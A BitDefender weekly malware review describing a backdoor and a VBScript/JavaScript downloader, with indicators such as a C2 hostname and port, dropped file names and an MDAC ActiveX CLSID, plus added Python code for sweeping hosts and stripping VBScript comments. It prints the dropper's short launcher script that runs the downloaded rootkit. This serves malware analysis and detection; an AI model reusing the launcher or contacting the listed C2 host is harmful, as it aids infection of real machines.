Weekly Review – Unpatched systems are getting it ...
Backdoor.Agent.AADK
Upon execution it overwrites the non-critical Windows driver "beep.sys" with a rootkit, detected by BitDefender as Trojan.Rootkit.GGR, which gives the malware access to the SSDT (System Service Descriptor Table). Replacing an existing driver that nothing depends on is a cheap way to get kernel code loaded without registering a new, conspicuous driver.
A second component is dropped in %windir%\system32 and is loaded as a service at every system startup. The service is named "MS Media Control Center" and carries the description "Provides support for T*m*t*D.dll", where each * is a random ASCII character. This DLL is detected as Backdoor.PCClient.TEO.
The backdoor tries to connect to awen667788.3322.org on TCP port 1122, sends synchronization packets and waits for remote commands or a new malware file, which it saves as C:\1.exe. Note that 3322.org is a dynamic DNS service, so the address behind that name can change at any time; block or alert on the hostname rather than on a resolved IP.
Trojan.Downloader.JS.Psyme.SR
This Trojan uses obfuscated VBScript and JavaScript to download and execute other malware on the user's computer. It is not executed from a web page; it runs locally on the already-infected machine.
It is part of a drive-by exploit chain (like Trojan.Exploit.SSX - http://www.bitdefender.com/VIRUS-1000396-en--Trojan.Exploit.SSX.html) that uses known vulnerabilities to infiltrate unpatched systems. This one tries to exploit a vulnerability in the Microsoft Data Access Components (MDAC) ActiveX object, instantiated through its CLSID BD96C556-65A3-11D0-983A-00C04FC29E36 (the RDS.DataSpace control, patched by MS06-014), in order to download a file from hxxp://?.weixk.com/[removed].css, detected by BitDefender as Rootkit.Agent.AIWN. The .css extension is only a disguise; the file is an executable and is saved under %temp% with the name "GameeeEeee.pif".
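The indicators in the two write-ups above (the service name and its wildcarded DLL description, the C2 host and port, the two dropped file names and the MDAC CLSID) are what a responder would sweep a fleet for. The following Python is an added example, not BitDefender's code and not part of the original page; it runs every indicator over a constructed host snapshot (the sample services, connections, files and fetched page are invented here, not real telemetry). The wildcard positions in the DLL name are matched against any printable ASCII character, as the description above reports.

```python
import re

# Indicators quoted from the write-up above. The three wildcard positions in the
# DLL name are reported as random ASCII characters, so match any printable one.
SERVICE_NAME = "MS Media Control Center"
SERVICE_DESC_RE = re.compile(
    r"^Provides support for T[\x20-\x7e]m[\x20-\x7e]t[\x20-\x7e]D\.dll$")
C2_HOST = "awen667788.3322.org"   # dynamic DNS name, so match the name, not an IP
C2_PORT = 1122
MDAC_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36".lower()
BACKDOOR_DROP = r"c:\1.exe"
PSYME_DROP = "GameeeEeee.pif".lower()   # lands in %temp%, so compare the basename


def is_backdoor_service(name, description):
    """Backdoor.Agent.AADK persistence: the service name or its wildcarded description."""
    return name == SERVICE_NAME or SERVICE_DESC_RE.match(description) is not None


def is_c2_connection(remote_host, remote_port):
    """Outbound connection to the backdoor's command-and-control endpoint."""
    return remote_host.lower().rstrip(".") == C2_HOST and remote_port == C2_PORT


def is_dropped_file(path):
    """Either payload location named in the two write-ups."""
    p = path.lower()
    return p == BACKDOOR_DROP or p.rsplit("\\", 1)[-1] == PSYME_DROP


def references_mdac_clsid(content):
    """Page or script content that instantiates the MDAC ActiveX object by CLSID."""
    return MDAC_CLSID in content.lower()


def sweep(snapshot):
    """Run all indicators over a host snapshot; returns a list of (kind, detail)."""
    findings = []
    for name, desc in snapshot.get("services", []):
        if is_backdoor_service(name, desc):
            findings.append(("service", name))
    for host, port in snapshot.get("connections", []):
        if is_c2_connection(host, port):
            findings.append(("c2", f"{host}:{port}"))
    for path in snapshot.get("files", []):
        if is_dropped_file(path):
            findings.append(("file", path))
    for url, body in snapshot.get("web_content", []):
        if references_mdac_clsid(body):
            findings.append(("mdac_clsid", url))
    return findings


# Constructed sample snapshot for this example; not real telemetry.
SAMPLE = {
    "services": [
        ("Spooler", "Loads files to memory for later printing"),
        ("MS Media Control Center", "Provides support for TxmAtqD.dll"),
    ],
    "connections": [("update.microsoft.com", 443), ("awen667788.3322.org", 1122)],
    "files": [
        r"C:\Windows\system32\beep.sys",
        r"C:\1.exe",
        r"C:\Users\bob\AppData\Local\Temp\GameeeEeee.pif",
    ],
    "web_content": [
        ("hxxp://landing.example/index.html",
         '<object classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"></object>'),
    ],
}

if __name__ == "__main__":
    for kind, detail in sweep(SAMPLE):
        print(f"{kind:10} {detail}")
```

The CLSID check is case-insensitive because the GUID appears in both cases in the wild, and the overwritten beep.sys is deliberately not matched by path alone: the file exists on every Windows host, so a real check there needs the driver's hash or signature, which the write-up does not give.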
Afterwards it creates another VBScript file with the following content:
'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gomeee TEAM'i LOVE gomeee TEAM
Love_gameee.run ("%Temp%\GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM
Every line except the Set and the Run call is a comment, so this script does nothing but launch the downloaded rootkit through the Run method of a WScript.Shell object.
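The launcher above is a typical comment-padded script: the only live statements are the CreateObject and the Run call. The Python below is an added example, not code from the page, that strips VBScript comments without breaking string literals (a single quote inside a double-quoted string is data, not a comment, and REM is a comment too) and then pulls out what each WScript.Shell object is asked to run. The sample script is reconstructed from the listing above; the extra test lines with an apostrophe in a string and a REM comment are constructed.

```python
import re

SHELL_RE = re.compile(
    r'Set\s+(\w+)\s*=\s*CreateObject\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)


def strip_vbs_comments(src):
    """Drop VBScript comments and blank lines, leaving string literals intact.

    VBScript strings are double-quoted and escape a quote by doubling it, so a
    single quote (') inside a string is data, not a comment marker. REM is also
    a comment, but only when it stands as its own word.
    """
    kept = []
    for line in src.splitlines():
        in_string = False
        cut = len(line)
        for i, ch in enumerate(line):
            if ch == '"':
                # A doubled "" toggles twice, which is the right net effect.
                in_string = not in_string
            elif not in_string:
                if ch == "'":
                    cut = i
                    break
                if (line[i:i + 3].lower() == "rem"
                        and (i == 0 or line[i - 1] in " \t:")
                        and (i + 3 >= len(line) or line[i + 3] in " \t")):
                    cut = i
                    break
        cleaned = line[:cut].strip()
        if cleaned:
            kept.append(cleaned)
    return "\n".join(kept)


def extract_run_targets(src):
    """Return what each WScript.Shell object in the script is asked to Run."""
    clean = strip_vbs_comments(src)
    targets = []
    for var in SHELL_RE.findall(clean):
        run_re = re.compile(
            r"\b" + re.escape(var) + r'\.Run\s*\(?\s*"([^"]*)"', re.IGNORECASE)
        targets.extend(run_re.findall(clean))
    return targets


# Reconstructed from the listing above (the dropped launcher script).
SAMPLE_VBS = r"""'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gomeee TEAM'i LOVE gomeee TEAM
Love_gameee.run ("%Temp%\GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM
"""

if __name__ == "__main__":
    print(strip_vbs_comments(SAMPLE_VBS))
    print("runs:", extract_run_targets(SAMPLE_VBS))
```

The string-aware scan is the part worth keeping: a naive `line.split("'")[0]` would truncate any script that writes a quote inside a string (common in real droppers that build paths or commands), and the padded comments are exactly the noise a scanner has to discard before the dropped path becomes visible.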
Information in this article is available courtesy of BitDefender virus researchers: Ovidiu Visoiu, Daniel Chipiristeanu.
Copyright 2011. Site powered by Bitdefender